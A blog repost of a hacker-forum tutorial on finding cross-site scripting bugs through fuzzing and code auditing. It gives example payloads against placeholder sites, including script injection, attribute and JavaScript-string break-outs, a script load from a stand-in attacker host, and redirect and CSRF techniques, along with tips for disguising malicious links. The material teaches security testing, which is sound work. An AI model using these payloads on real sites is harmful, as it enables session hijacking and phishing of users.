<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCsICJmPJO6ld-W7YsegFWgiYY7aRQ3tjQub1CWmvYNOwBSNDKLQ5u9OweGmYgpeUvkMMhAe1nSL1_mx4PkahQMf7dMTRWMfyVjgbSOkMPoEjvfSQ1f1Mxwkv82JswtFX7Ffi6HZYx4rrl/s1600/XSS+cross+site+scripting+vulnerability.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="182" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCsICJmPJO6ld-W7YsegFWgiYY7aRQ3tjQub1CWmvYNOwBSNDKLQ5u9OweGmYgpeUvkMMhAe1nSL1_mx4PkahQMf7dMTRWMfyVjgbSOkMPoEjvfSQ1f1Mxwkv82JswtFX7Ffi6HZYx4rrl/s400/XSS+cross+site+scripting+vulnerability.gif" width="400" /></a></div>
<br />
<div style="margin: 0px; padding: 0px;">
<div id="post_message_8389" style="margin: 0px; padding: 0px;">
<br />
Dear fellow members of RAH-Labs<br />
<br />
<br />
This tutorial was originally meant only for DeadHackers as an exclussive guide,<br />
however after they have changed their site multiple times I thought that<br />
I would post it here before it might get removed since this guide took a lot<br />
of time to create. (almost a whole day at work)<br />
<br />
This tutorial does NOT contain actual attack code so you'll have to make that up yourself.<br />
<br />
<b>___ -:: Introduction ::- ____________</b><br />
<br />
<br />
<b>What is <acronym style="border-bottom: 1px dotted rgb(0, 0, 0); border-width: 0px 0px 1px; cursor: help; font-variant: normal;" title="Cross Site Scripting">XSS</acronym> and what does it refer to?</b><br />
<acronym style="border-bottom: 1px dotted rgb(0, 0, 0); border-width: 0px 0px 1px; cursor: help; font-variant: normal;" title="Cross Site Scripting">XSS</acronym> aka Cross Site Scripting is a client-side attack where an attacker creates a malicious link,<br />
containing script- code which is then executed within the victim's browser. The script-code<br />
can be any language supported by the browser but mostly HTML and Javascript is used along<br />
with embedded Flash, Java or ActiveX.<br />
<br />
<b>What can Cross Site Scripting be used for?</b><br />
Cross Site Scripting can be used for a variety of things, such as session-hijacking, browser<br />
attacks, phishing, propaganda and even worms! However it still requires the victim to click<br />
a malicious link created by the attacker.<br />
<br />
<b>How could One get a victim to click a <acronym style="border-bottom: 1px dotted rgb(0, 0, 0); border-width: 0px 0px 1px; cursor: help; font-variant: normal;" title="Cross Site Scripting">XSS</acronym>-link?</b><br />
The easiest way to get people to click malicious links is to make them look authentic and non-<br />
malicious. Giving them a reason afterwards is the social-engineering part which should be easy<br />
except if the victim is aware of such attacks and / or has measures against Cross Site Scripting, such as NoScript.<br />
<br />
<b>How does One avoid <acronym style="border-bottom: 1px dotted rgb(0, 0, 0); border-width: 0px 0px 1px; cursor: help; font-variant: normal;" title="Cross Site Scripting">XSS</acronym>-links looking suspicious?</b><br />
This is typically done with encoding, short url services, redirects and even flash!<br />
<br />
<b>Which types of Cross Site Scripting are there?</b><br />
The most common types are GET- and POST-based <acronym style="border-bottom: 1px dotted rgb(0, 0, 0); border-width: 0px 0px 1px; cursor: help; font-variant: normal;" title="Cross Site Scripting">XSS</acronym>. However Cross Site Scripting can also<br />
be triggered via cookies. Some individuals claims that <acronym style="border-bottom: 1px dotted rgb(0, 0, 0); border-width: 0px 0px 1px; cursor: help; font-variant: normal;" title="Cross Site Scripting">XSS</acronym> can also be divided into persistent and<br />
non-persistent but those types are also and should be refered to as injection which is a different<br />
class of bugs / vulnerabilities.<br />
<br />
<b>What is the difference between GET- and POST-<acronym style="border-bottom: 1px dotted rgb(0, 0, 0); border-width: 0px 0px 1px; cursor: help; font-variant: normal;" title="Cross Site Scripting">XSS</acronym>?</b><br />
The difference is that when GET-variables is used it is possible to conduct normal <acronym style="border-bottom: 1px dotted rgb(0, 0, 0); border-width: 0px 0px 1px; cursor: help; font-variant: normal;" title="Cross Site Scripting">XSS</acronym> attacks<br />
where an attacker sends a malicious crafted URL to the victim which is then executed when<br />
the victim opens the link in the browser.<br />
<br />
With POST-variables an attacker could f.ex. use flash to send the victim to the POST-<acronym style="border-bottom: 1px dotted rgb(0, 0, 0); border-width: 0px 0px 1px; cursor: help; font-variant: normal;" title="Cross Site Scripting">XSS</acronym><br />
vulnerable site since it is not possible to create a URL when POST-variables are in use.<br />
<br />
<b>Are there sub-categories of Cross Site Scripting?</b><br />
At the moment there's XSSR and <acronym style="border-bottom: 1px dotted rgb(0, 0, 0); border-width: 0px 0px 1px; cursor: help; font-variant: normal;" title="Cross Site SQL Injection">XSSQLI</acronym>. One could say that <acronym style="border-bottom: 1px dotted rgb(0, 0, 0); border-width: 0px 0px 1px; cursor: help; font-variant: normal;" title="Cross Site Request Forgery">XSRF</acronym>/<acronym style="border-bottom: 1px dotted rgb(0, 0, 0); border-width: 0px 0px 1px; cursor: help; font-variant: normal;" title="Cross Site Request Forgery">CSRF</acronym> belongs to the same<br />
category, however the attack method differs too much from traditional Cross Site Scripting.<br />
XSSR or CSSR aka Cross Site Script Redirection is used to redirect a victim to another page<br />
unwillingly. The page can for example contain a phishing template, browser attack code or in<br />
some cases where the data or javascript URI scheme is used: session-hijacking. <acronym style="border-bottom: 1px dotted rgb(0, 0, 0); border-width: 0px 0px 1px; cursor: help; font-variant: normal;" title="Cross Site SQL Injection">XSSQLI</acronym> is a<br />
mix of Cross Site Scripting and SQL Injection, where an unknowing victim clicks a malicious link<br />
containing SQL Injection instructions for an area in the website which requires privileges that<br />
guests or members doesn't have. <acronym style="border-bottom: 1px dotted rgb(0, 0, 0); border-width: 0px 0px 1px; cursor: help; font-variant: normal;" title="Cross Site Request Forgery">XSRF</acronym> or <acronym style="border-bottom: 1px dotted rgb(0, 0, 0); border-width: 0px 0px 1px; cursor: help; font-variant: normal;" title="Cross Site Request Forgery">CSRF</acronym> (sometimes refered to as C-Surf) stands for<br />
Cross Site Request Forgery which is used to send input from a 3rd party site to the target site.<br />
<acronym style="border-bottom: 1px dotted rgb(0, 0, 0); border-width: 0px 0px 1px; cursor: help; font-variant: normal;" title="Cross Site Request Forgery">XSRF</acronym> can in some cases be triggered just by viewing a specially crafted image but the most<br />
commonly used are URLs. With Cross Site Request Forgery it might be possible to f.ex. alter<br />
the password of the victim if the target site is not secured properly with tokens etc.<br />
<br />
<b>Process  of XSS</b><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjaKMPe1R9HQhDScyucl-Gu0ITmTrDiWcnsFz8RmyXEFGhoRQxc6UDfZ8sQqhv8Q4KBnH1eYaZFVlosheAqcMFZsT6WaRaNsflTrsu6oYR3CP1jSGTOgM74EIquDqVP9YeIPuxCjDc0hJzP/s1600/xss_how.png" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="380" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjaKMPe1R9HQhDScyucl-Gu0ITmTrDiWcnsFz8RmyXEFGhoRQxc6UDfZ8sQqhv8Q4KBnH1eYaZFVlosheAqcMFZsT6WaRaNsflTrsu6oYR3CP1jSGTOgM74EIquDqVP9YeIPuxCjDc0hJzP/s640/xss_how.png" width="640" /></a></div>
<b> </b> <br />
<br />
<br />
<b>What is XST and can it be used for anything?</b><br />
XST also known as Cross Site (Script) Tracing is a way of abusing the HTTP Trace (Debug)<br />
protocol. Anything that an attacker sends to a web-server that has TRACE enabled will send<br />
the same answer back. If an attacker sends the following:<br />
<br />
<div class="bbcode_container" style="display: block; margin: 5px 20px 20px; padding: 0px;">
<div class="bbcode_description" style="margin: 0px; padding: 0px;">
Code:</div>
<pre class="bbcode_code" style="background-color: #f2f6f8; border: 1px inset; direction: ltr; font-family: monospace; font-size: 12px; height: 60px; line-height: 12px; margin: 0px; overflow: scroll; padding: 6px; text-align: left;">TRACE / HTTP/1.0     Host: target.tld     Custom-header: <script>alert(0)</script></pre>
</div>
Then the attacker will receive the same "Custom-header: <scr..." back allowing script execution.<br />
However after recent browser updates the following year(s) XST has been increasingly harder to<br />
control and execute properly.<br />
<br />
<b>How is it possible to find <acronym style="border-bottom: 1px dotted rgb(0, 0, 0); border-width: 0px 0px 1px; cursor: help; font-variant: normal;" title="Cross Site Scripting">XSS</acronym> bugs within websites?</b><br />
There are 2 methods: code / script auditing or fuzzing which is described below.<br />
<br />
<b>What kind of tools is required to find <acronym style="border-bottom: 1px dotted rgb(0, 0, 0); border-width: 0px 0px 1px; cursor: help; font-variant: normal;" title="Cross Site Scripting">XSS</acronym> bugs?</b> (REQ = Required, OPT = Optional)<br />
- REQ: An Internet Browser (such as FireFox) in case you're fuzzing.<br />
- REQ: A text-viewer (such as notepad) in case you're auditing.<br />
- OPT: An intercepting proxy in case you're doing more advanced <acronym style="border-bottom: 1px dotted rgb(0, 0, 0); border-width: 0px 0px 1px; cursor: help; font-variant: normal;" title="Cross Site Scripting">XSS</acronym>. (In FireFox it is possible to use Tamper Data).<br />
- OPT: Browser Addons, for FireFox the following are especially useful: Firebug, JSView and LiveHTTP Headers.<br />
<br />
<b>What else is useful to know if One wants to find <acronym style="border-bottom: 1px dotted rgb(0, 0, 0); border-width: 0px 0px 1px; cursor: help; font-variant: normal;" title="Cross Site Scripting">XSS</acronym> bugs?</b><br />
- Browser limitations regarding Cross Site Scripting [1]<br />
- HTTP Headers and how the HTTP protocol works.<br />
- HTML + Javascript and perhaps embedded script attacks. (flash etc.)<br />
- Intercepting proxies (Burp etc.), differential tools (meld, ExamDiff, etc.)<br />
- Useful browser-addons (see FireCat [3])<br />
- Website scanners (Nikto, W3AF, Grendel, Directory-fuzzers etc.)<br />
<br />
<b>Where is <acronym style="border-bottom: 1px dotted rgb(0, 0, 0); border-width: 0px 0px 1px; cursor: help; font-variant: normal;" title="Cross Site Scripting">XSS</acronym>-bugs typically located?</b><br />
It is usually located in user submitted input either via GET or POST variables, where it is reflected on<br />
the target site as text outside tags, inside tag values or within javascript. It can also in some cases<br />
be submitted via cookies, http headers or in rare cases file uploads.<br />
<br />
<b>How does One protect a site against <acronym style="border-bottom: 1px dotted rgb(0, 0, 0); border-width: 0px 0px 1px; cursor: help; font-variant: normal;" title="Cross Site Scripting">XSS</acronym>?</b><br />
The best way is to ensure that all user input and output is validated properly. However in some cases<br />
an IPS or WAF can also protect against <acronym style="border-bottom: 1px dotted rgb(0, 0, 0); border-width: 0px 0px 1px; cursor: help; font-variant: normal;" title="Cross Site Scripting">XSS</acronym> though the best way is still to validate the user-input and -output properly.<br />
<br />
<b>___ -:: Finding the Bug - With Fuzzing ::- ____________</b><br />
<br />
<br />
<b>[EASY] Example Case - A:</b><br />
<br />
<br />
We're at <a href="http://buggysite.tld/">http://buggysite.tld/</a> where we see a "Search-field" in the top-right. Since we don't know the<br />
real source code but only the HTML-output of the site we will have to fuzz anything where it is possible<br />
to submit data. In some cases the data will be reflected on the site and in some cases it wont. If it doesn't<br />
we move on to the next cookie, header, get / post variable or whatever it is that we are fuzzing.<br />
<br />
The most effective way to fuzz is not to write: <script>alert(0)</script> since many sites has different<br />
precautions against Cross Site Scripting. Instead we create a custom string which in most cases wont<br />
trigger anything that might alter the output of the site or render error pages that aren't vulnerable.<br />
<br />
An example of an effective string could be: "keyword'/\><<br />
<br />
" ' /\ > and < are the most commonly used html characters used in Cross Site Scripting. However if we want<br />
to be really thorough then we could also add )(][}{% to the string that we are using to fuzz the target site.<br />
<br />
The reason why there's not two of " or ' is because this can trigger a WAF, IPS or whatever precaution the site<br />
might have tried to implement against <acronym style="border-bottom: 1px dotted rgb(0, 0, 0); border-width: 0px 0px 1px; cursor: help; font-variant: normal;" title="Cross Site Scripting">XSS</acronym> instead of using a secure coding scheme /plan / development cycle.<br />
The reason why all characters are written as >< instead of <> is because this is a common bypass against <acronym style="border-bottom: 1px dotted rgb(0, 0, 0); border-width: 0px 0px 1px; cursor: help; font-variant: normal;" title="Cross Site Scripting">XSS</acronym>-filters!<br />
<br />
With that in mind, we use the following string: "haxxor'/\>< to fuzz the search-field:<br />
<br />
Lets take a look at the returned HTML-code:<br />
<br />
<div class="bbcode_container" style="display: block; margin: 5px 20px 20px; padding: 0px;">
<div class="bbcode_description" style="margin: 0px; padding: 0px;">
HTML Code:</div>
<pre class="bbcode_code" style="background-color: #f2f6f8; border: 1px inset; direction: ltr; font-family: monospace; font-size: 12px; line-height: 12px; margin: 0px; overflow: scroll; padding: 6px; text-align: left;">...     <span style="color: #ff8000;"><input type=<span style="color: blue;">"text"</span> name=<span style="color: blue;">"search"</span> value=<span style="color: blue;">"<b><i>&quot;</i></b>haxxor'/\<b><i>&gt;</i></b><b><i>&lt;</i></b>"</span> /></span> <span style="color: navy;"><br /></span> You searched for \"haxxor\'/\\>< which returned no results.     ...</pre>
</div>
As we can see the input tag encoded our fuzzing string correct, however the text afterwards did not encode it<br />
properly as it only added slashes which is completely useless against Cross Site Scripting in this case.<br />
<br />
By submitting the following string we can <acronym style="border-bottom: 1px dotted rgb(0, 0, 0); border-width: 0px 0px 1px; cursor: help; font-variant: normal;" title="Cross Site Scripting">XSS</acronym> their website: <script>alert(0)</script> or perhaps <script src=<a href="http://h4x0r.tld/xss.js">http://h4x0r.tld/xss.js</a>></script><br />
<br />
Of course we don't know if the following characters : ( ) and . are filtered but in most cases they work.<br />
<br />
Our final <acronym style="border-bottom: 1px dotted rgb(0, 0, 0); border-width: 0px 0px 1px; cursor: help; font-variant: normal;" title="Cross Site Scripting">XSS</acronym>-url could be: <a href="http://buggysite.tld/search.php?query=%3Cscript%3Ealert%280%29%3C/script%3E">http://buggysite.tld/search.php?query=<script>alert(0)</script></a><script>alert(0)</script> if GET-variables are used.<br />
<br />
<br />
<b>[EASY] Example Case - B:</b><br />
We're at <a href="http://yetanothersite.tld/">http://yetanothersite.tld/</a> where we see another search formular.<br />
<br />
The following is returned after our string is submitted to the search field:<br />
<br />
<div class="bbcode_container" style="display: block; margin: 5px 20px 20px; padding: 0px;">
<div class="bbcode_description" style="margin: 0px; padding: 0px;">
HTML Code:</div>
<pre class="bbcode_code" style="background-color: #f2f6f8; border: 1px inset; direction: ltr; font-family: monospace; font-size: 12px; line-height: 12px; margin: 0px; overflow: scroll; padding: 6px; text-align: left;">...     <input type="text" name="search" value="\"haxxor\'/\\><span style="color: navy;"><" /></span> <span style="color: navy;"><br /></span> You searched for <b><i>&quot;</i></b>haxxor'/\<b><i>&gt;</i></b><b><i>&lt;</i></b> which returned no results.     ...</pre>
</div>
In this case the string after the tag encoded the string properly, however the string inside the tag only had some<br />
slashes added which does nothing in this case. Basically we can bypass this easily with: "><script>alert(0)</script><br />
<br />
If we're going to load external javascript we will have to avoid using " and ' of course.<br />
<br />
Our final <acronym style="border-bottom: 1px dotted rgb(0, 0, 0); border-width: 0px 0px 1px; cursor: help; font-variant: normal;" title="Cross Site Scripting">XSS</acronym>-url could be: <a href="http://yetanothersite.tld/search.php?query=%22%3E%3Cscript%3Ealert%280%29%3C/script%3E">http://yetanothersite.tld/search.php?query="><script>alert(0)</script></a> if GET-variables are used.<br />
<br />
<b>[MODERATE] Example Case - C:</b><br />
We're at <a href="http://prettysecure.tld/">http://prettysecure.tld/</a> where we find yet another search field, it's time to submit our fuzzing string.<br />
<br />
The following HTML-code is returned after our string is submitted:<br />
<br />
<div class="bbcode_container" style="display: block; margin: 5px 20px 20px; padding: 0px;">
<div class="bbcode_description" style="margin: 0px; padding: 0px;">
HTML Code:</div>
<pre class="bbcode_code" style="background-color: #f2f6f8; border: 1px inset; direction: ltr; font-family: monospace; font-size: 12px; line-height: 12px; margin: 0px; overflow: scroll; padding: 6px; text-align: left;">...     <span style="color: #ff8000;"><input type=<span style="color: blue;">"text"</span> name=<span style="color: blue;">"search"</span> value=<span style="color: blue;">"<b><i>&quot;</i></b>haxxor'/\<b><i>&gt;</i></b><b><i>&lt;</i></b>"</span>></span> You searched for "<b><i>&quot;</i></b>haxxor'/\<b><i>&gt;</i></b><b><i>&lt;</i></b>" which returned no results.     ... (further down)     <span style="color: maroon;"><script></span>     ...     s.prop1="prettysecure";     s.prop2="\"haxxor%39/\%3E%3C";     s.prop3="adspace";     ...     <span style="color: maroon;"></script></span></pre>
</div>
For most people this might look secure but it really isn't. A lot of people also overlooks potential Cross Site Scripting<br />
vectors if their string <script>alert(0)</script> is either not output directly or encoded where they expect the <acronym style="border-bottom: 1px dotted rgb(0, 0, 0); border-width: 0px 0px 1px; cursor: help; font-variant: normal;" title="Cross Site Scripting">XSS</acronym><br />
bug to be. This is why it is important to use a keyword that doesn't exist on the site, such as haxxor or something<br />
better. The reason why a keyword is used is because it is searchable almost always, you can call it a <acronym style="border-bottom: 1px dotted rgb(0, 0, 0); border-width: 0px 0px 1px; cursor: help; font-variant: normal;" title="Cross Site Scripting">XSS</acronym>-locator. [1]<br />
<br />
Anyway, back to our example. s.prop2="\"haxxor%39/\%3E%3C"; looks secure but the flaw is that backspace aka \ is not<br />
filtered or encoded correct. So if we write: \" it will become \\", which will escape the first \ but not our quote.<br />
As you can see, we can't use tags either so we'll have to do something else.<br />
<br />
We have of course checked that brackets ( ) are NOT filtered. (in some cases they can be).<br />
<br />
By entering the following string we are able to create an alert box: \"; alert(0); s.prop500=\"<br />
This will become: s.prop2=\\"; alert(0); s.prop500=\\" when we submit the string. The reason why we add the s.prop500=\"<br />
variable to our string is because the javascript will most likely NOT execute if we don't. We could also use comments so instead<br />
of s.prop500=\" we just use // in the end of the string.<br />
<br />
In this case it is also possible to execute external javascript if One uses a bit more advanced javascript.<br />
In order to do this we can use document.write(String.fromCharCode()); where you will need a decimal converter.<br />
<br />
Our final <acronym style="border-bottom: 1px dotted rgb(0, 0, 0); border-width: 0px 0px 1px; cursor: help; font-variant: normal;" title="Cross Site Scripting">XSS</acronym>-url could be: <a href="http://prettysecure.tld/search.php?query=%5C">http://prettysecure.tld/search.php?query=\</a>"; alert(0); s.prop500=\"<br />
<br />
<b>___ -:: Finding the Bug - With Auditing ::- ____________</b><br />
<b>[EASY] Example Case - A:</b><br />
<br />
The following file (index.php) has some interesting code:<br />
<br />
<div class="bbcode_container" style="display: block; margin: 5px 20px 20px; padding: 0px;">
<div class="bbcode_description" style="margin: 0px; padding: 0px;">
PHP Code:</div>
<div class="bbcode_code" style="background-color: #f2f6f8; border: 1px inset; direction: ltr; font-size: 12px; height: 96px; margin: 0px; overflow: scroll; padding: 6px; text-align: left;">
<code style="font-family: monospace; line-height: 12px; margin: 0px; padding: 0px;"><code style="font-family: monospace; line-height: 12px; margin: 0px; padding: 0px;"><span style="color: black;"><span style="color: #0000bb;">    </span><span style="color: #007700;">...<br />
    if(</span><span style="color: #0000bb;">$_GET</span><span style="color: #007700;">[</span><span style="color: #dd0000;">'view_profile'</span><span style="color: #007700;">]==</span><span style="color: #0000bb;">1</span><span style="color: #007700;">) {<br />
    echo </span><span style="color: #0000bb;">$_GET</span><span style="color: #007700;">[</span><span style="color: #dd0000;">'name'</span><span style="color: #007700;">];<br />
    ... (</span><span style="color: #0000bb;">more code</span><span style="color: #007700;">)<br />
    }<br />
    ...  </span><span style="color: #0000bb;"></span></span></code></code></div>
</div>
By looking at the above code we can see that if view_profile is equal to 1 then the script prints the "name" variable.<br />
An example attack URL could look like: <a href="http://testz.tld/index.php?view_profile=1&name=">http://testz.tld/index.php?view_profile=1&name=</a><script>alert(0)</script><br />
<br />
<b>[HARD] Example Case - B:</b><br />
<br />
The following file (search.php) has some interesting code:<br />
<br />
<div class="bbcode_container" style="display: block; margin: 5px 20px 20px; padding: 0px;">
<div class="bbcode_description" style="margin: 0px; padding: 0px;">
PHP Code:</div>
<div class="bbcode_code" style="background-color: #f2f6f8; border: 1px inset; direction: ltr; font-size: 12px; height: 96px; margin: 0px; overflow: scroll; padding: 6px; text-align: left;">
<code style="font-family: monospace; line-height: 12px; margin: 0px; padding: 0px;"><code style="font-family: monospace; line-height: 12px; margin: 0px; padding: 0px;"><span style="color: black;"><span style="color: #0000bb;">    </span><span style="color: #007700;">...<br />
    if(</span><span style="color: #0000bb;">$_GET</span><span style="color: #007700;">[</span><span style="color: #dd0000;">'set_flag'</span><span style="color: #007700;">]==</span><span style="color: #0000bb;">1</span><span style="color: #007700;">) {<br />
    </span><span style="color: #0000bb;">$var </span><span style="color: #007700;">= </span><span style="color: #dd0000;">"checked"</span><span style="color: #007700;">;<br />
    }<br />
    echo </span><span style="color: #dd0000;">"<input type='radio' value='flag' checked='" </span><span style="color: #007700;">.</span><span style="color: #0000bb;">htmlentities</span><span style="color: #007700;">(</span><span style="color: #0000bb;">$var</span><span style="color: #007700;">). </span><span style="color: #dd0000;">"' />"</span><span style="color: #007700;">;<br />
    ...  </span><span style="color: #0000bb;"></span></span></code></code></div>
</div>
This is a conditional vulnerability where register_globals in php.ini has to be set to On. (Off is factory default).<br />
Register_Globals basically allows an individual to set variables on the fly, even if they are not meant to be set.<br />
<br />
This only applies to variables that are NOT set as in the example above. Another problem we have encountered<br />
is htmlentities however due to a coding error we can still abuse the tag without creating a new.<br />
We will need to use event handlers in the <input> tag and some CSS (Cascading Style Sheet) to make sure that<br />
the victim triggers the eventhandler no matter what. There's multiple ways of doing that, one of them is:<br />
<br />
<div class="bbcode_container" style="display: block; margin: 5px 20px 20px; padding: 0px;">
<div class="bbcode_description" style="margin: 0px; padding: 0px;">
HTML Code:</div>
<pre class="bbcode_code" style="background-color: #f2f6f8; border: 1px inset; direction: ltr; font-family: monospace; font-size: 12px; line-height: 12px; margin: 0px; overflow: scroll; padding: 6px; text-align: left;">style='display:block;width:99999px;height:99999px;'</pre>
</div>
An eventhandler that we could use in this case could be onmouseover, even though onblur might be better.<br />
<br />
You might ask yourself, why is the above script not secure? Because htmlentities() used that way is insecure, due to<br />
that the tag looks like this in html form: <input type='radio' value='flag' checked='$var' /><br />
<br />
Inside the checked value our variable ($var) is encoded, but only " > and < are encoded, not ' due to ENT_QUOTES<br />
were not set in the htmlentities function. This means that we can break out of checked='' easily.<br />
<br />
An example attack URL could be: <a href="http://was-secure.tld/search.php?test=%27%20style=%27display:block;width:99999px;height:99999px;%20%27%20onmouseover=%27alert%280%29">http://was-secure.tld/search.php?test=' style='display:block;width:99999px;height:99999px; ' onmouseover='alert(0)</a><br />
<br />
<br />
There is no "Example Case - C" since I have gone through most the important of Cross Site Scripting.<br />
<br />
<b>___ -:: Additional Information ::- ____________</b><br />
<b>XSSR</b><br />
<br />
<br />
When it is possible to send a user to the data or javascript URI scheme either via A) GET- or POST-variables or B) User<br />
submitted content such as a link then the XSSR category applies to the bug. However some individuals has claimed that<br />
a site that only accepts HTTP or HTTPS links via GET-variables also falls under the XSSR category.<br />
<br />
An example of XSSR could be: <a href="http://somesite.tld/redirect.php?link=data:text/html,%3Cscript%3Ealert%280%29%3C/script%3E">http://somesite.tld/redirect.php?link=data:text/html,<script>alert(0)</script></a><br />
And if the Javascript URI scheme is used: <a href="http://somesite.tld/redirect.php?link=javascript:alert%280%29;">http://somesite.tld/redirect.php?link=javascript<b></b>:alert(0);</a><br />
<br />
This has in some cases been known to leak cookies and is therefore used in session-hijacking.<br />
<br />
<b><acronym style="border-bottom: 1px dotted rgb(0, 0, 0); border-width: 0px 0px 1px; cursor: help; font-variant: normal;" title="Cross Site SQL Injection">XSSQLI</acronym></b><br />
<br />
<br />
When a SQL Injection vulnerability exists within a privileged area of the target site, <acronym style="border-bottom: 1px dotted rgb(0, 0, 0); border-width: 0px 0px 1px; cursor: help; font-variant: normal;" title="Cross Site SQL Injection">XSSQLI</acronym> becomes usable.<br />
<br />
An example of <acronym style="border-bottom: 1px dotted rgb(0, 0, 0); border-width: 0px 0px 1px; cursor: help; font-variant: normal;" title="Cross Site SQL Injection">XSSQLI</acronym> could be tricking the administrator of "shouldbescure.tld" to click either the SQL Injection<br />
link or click a Cross Site Scripting link which contains a call to the SQL Injection in the privileged area of the site<br />
where this could be the vulnerable part:<a href="http://shouldbesecure.tld/admin.php?del=1%20AND%201=1/*"> http://shouldbesecure.tld/admin.php?del=1 AND 1=1/*</a><br />
<br />
<b><acronym style="border-bottom: 1px dotted rgb(0, 0, 0); border-width: 0px 0px 1px; cursor: help; font-variant: normal;" title="Cross Site Request Forgery">XSRF</acronym></b><br />
<br />
<br />
Also known as <acronym style="border-bottom: 1px dotted rgb(0, 0, 0); border-width: 0px 0px 1px; cursor: help; font-variant: normal;" title="Cross Site Request Forgery">CSRF</acronym> and C-Surf can be used against sites that doesn't use tokens which are usually hidden inside tags.<br />
A common way to use tokens against C-Surf attacks is to hide them inside tags like:<br />
<br />
<div class="bbcode_container" style="display: block; margin: 5px 20px 20px; padding: 0px;">
<div class="bbcode_description" style="margin: 0px; padding: 0px;">
HTML Code:</div>
<pre class="bbcode_code" style="background-color: #f2f6f8; border: 1px inset; direction: ltr; font-family: monospace; font-size: 12px; line-height: 12px; margin: 0px; overflow: scroll; padding: 6px; text-align: left;"><span style="color: #ff8000;"><input type=<span style="color: blue;">"hidden"</span> name=<span style="color: blue;">"anti-<acronym style="border-bottom: 1px dotted rgb(0, 0, 0); border-width: 0px 0px 1px; cursor: help; font-variant: normal;" title="Cross Site Request Forgery">csrf</acronym>"</span> value=<span style="color: blue;">"random token value"</span> /></span></pre>
</div>
If the tokens are not random enough it might be possible to calculate these and still use C-Surf in an attack.<br />
<br />
<br />
<br />
<b>References:</b><br />
[1] <a href="http://ha.ckers.org/xss.html" style="color: #417394; text-decoration: none;" target="_blank">http://ha.ckers.org/xss.html</a><br />
[2] <a href="http://en.wikipedia.org/wiki/Cross-site_scripting" style="color: #417394; text-decoration: none;" target="_blank">http://en.wikipedia.org/wiki/Cross-site_scripting</a><br />
[3] <a href="http://firecat.intern0t.net/" style="color: #417394; text-decoration: none;" target="_blank">http://firecat.intern0t.net/</a><br />
[4] <a href="http://deadhackers.eu/boards/viewtopic.php?f=9&t=22" style="color: #417394; text-decoration: none;" target="_blank">http://deadhackers.eu/boards/viewtopic.php?f=9&t=22</a><br />
[5] <a href="http://project67555.appspot.com/security.html">http://project67555.appspot.com/security.html</a><br />
<br />
[6] <a href="http://tamilaffection.com/?p=751">http://tamilaffection.com/?p=751</a></div>
<div id="post_message_8389" style="margin: 0px; padding: 0px;">
<br />
</div>
</div>
</div>

Hacking Hacking Tutorials Tutorials XSS XSS Tutorial - From Bug to Vulnerability

Dear fellow members of RAH-Labs This tutorial was originally meant only for DeadHackers as an exclussive guide, however after th...